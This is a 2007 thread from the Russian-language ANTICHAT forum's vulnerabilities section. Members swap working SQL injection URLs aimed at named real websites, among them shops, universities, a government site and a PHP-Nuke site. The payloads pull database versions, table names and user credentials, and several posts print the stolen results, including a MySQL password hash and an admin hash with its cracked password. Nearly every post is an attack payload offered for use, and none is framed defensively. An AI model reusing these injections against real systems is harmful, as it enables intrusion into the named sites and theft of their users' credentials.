HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 20.07.2007, 15:37
Barsik
Постоянный
Регистрация: 16.01.2005
Сообщений: 300
Провел на форуме:
3463790

Репутация: 726
Отправить сообщение для Barsik с помощью ICQ Отправить сообщение для Barsik с помощью MSN
По умолчанию

Код:
http://www.gaycentral.ru/news/?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11/*
http://www.superwriter.net/index.php?current_subsection=-3+UNION+SELECT+1,2,3,4,5,6,7,VERSION(),9/*
http://partytown.ru/music.php?id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,VERSION(),21/*
http://www.religion.no/bildebase/browse.php?action=overview&col=-9+UNION+SELECT+1,2,convert(concat(username,char(58),password)+using+latin1),4+FROM+arjan.users/*
 
Ответить с цитированием

Mssql
  #2  
Старый 20.07.2007, 18:14
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
По умолчанию Mssql

Ну вот нашарил скулей мелкософта.


Сайт: www.russianlink.com

Код:
http://www.russianlink.com/article1.asp?text=articles&ID=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+NOT+IN+('tbl_dating','tbl_gossip','tbl_cards','tbl_girls','D99_Tmp','dtproperties','sysconstraints','syssegments','tbl_album','tbl_articles'))--
//лень перебирать все таблицы.

Сайт: www.bcs.ru

Код:
http://www3.bcs.ru/webclients/chips/showonenew.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Сайт: www.appartment.ru

http://www.appartment.ru/app.asp?act=press&id=-1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATI ON_SCHEMA.TABLES)--

Сайт: www.nezachetov.net

Код:
http://nezachetov.net/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Сайт: www.volgogradinfo.ru

Код:
http://www.volgogradinfo.ru/shop/ozon/book/zakaz.asp?id=1%20or%201=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
 
Ответить с цитированием

  #3  
Старый 20.07.2007, 22:18
ENFIX
Участник форума
Регистрация: 06.06.2006
Сообщений: 213
Провел на форуме:
1628290

Репутация: 474
Отправить сообщение для ENFIX с помощью ICQ
По умолчанию

ггг =) 84 столбца =-O такого я еще не встречал )
Код:
http://www.csc.ncsu.edu/directories/faculty_info.php?id=-1670+UNION+SELECT+1,2,3,4,5,user(),7,8,database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,now(),sin(pi()-2),32,33,34,35,36,37,38,39,40,41,42,43,44,45,446,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85/*
 
Ответить с цитированием

  #4  
Старый 21.07.2007, 01:53
halkfild
Постоянный
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

hттp://www.bluerunventures.com/news_releases.php?nid=-156+union+select+1,2,3,User,Password,user(),7+from +mysql.user/*
pwruser
396bcbca6cf1b3cf

hттp://nam.kiev.ua/kaf/showkaf.php?K=-1+union+select+1,version(),database(),user(),5+/*
hттp://jaguar.com.ua/?navid=1'

не мое.. просто весело что давно уже
hттp://www.president.gov.ge/?l=E&m=0&sm=1&st=0&id=-2269+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20/*
 
Ответить с цитированием

  #5  
Старый 21.07.2007, 02:59
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://partytown.ru/music.php?id=-59+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+cinema__user/*
Код:
http://www.thepalestra.com/music.php?id=-3171+union+select+1,login,id,email,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users+limit+3570,1/*

Последний раз редактировалось SWAT; 21.07.2007 в 03:17..
 
Ответить с цитированием

  #6  
Старый 21.07.2007, 12:32
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
http://library2.fairfield.edu/dblist.php?s=-1+union+select+1,2,3,4,5,concat_ws(0x3a,USER(),DAT ABASE(),VERSION())
read@localhost:library:4.0.20
 
Ответить с цитированием

  #7  
Старый 21.07.2007, 15:33
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.treyporter.com/ylt/music.php?id=-5+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+21,1/*
Код:
http://omahanightlife.com/thearts-music.php?p=view&id=-220+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+information_schema.tables+limit+57,1/*

Последний раз редактировалось SWAT; 21.07.2007 в 15:55..
 
Ответить с цитированием

  #8  
Старый 21.07.2007, 20:05
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.stavki.info/index.php?page=forum&part=1&id=-1+union+select+1,concat_ws(0x3a,user(),database(), version())/*

случайно ткнул,.. странно... не могу найти имя таблицы =\
 
Ответить с цитированием

  #9  
Старый 21.07.2007, 23:15
Sn@k3
Познавший АНТИЧАТ
Регистрация: 13.04.2006
Сообщений: 1,738
Провел на форуме:
5151669

Репутация: 1198


Отправить сообщение для Sn@k3 с помощью ICQ
По умолчанию

http://www.uprava.org/section.php?id=-1+union+select+1,0x536e406b3320e2e8e4e8f220e2e0f12 e20cbeeec20efeee4e1e8f0e0f220f2e0e1ebe8f6f3,3,4,5, 6,7/*
 
Ответить с цитированием

  #10  
Старый 22.07.2007, 00:22
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Нашел багу в древнем модуле для PHP_Nuke
Код:
http://www.english4u.dp.ua/modules.php?name=Literature&op=Open&id=-1+union+select+1,2,3,4,5,6,user_password,8,9+from+nuke_users+where+username=0x446d69747279/*
хэш админа.
в админке привязка к айпи.

ах да, забыл, пасс 'dima'

Последний раз редактировалось n1†R0x; 22.07.2007 в 00:26..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ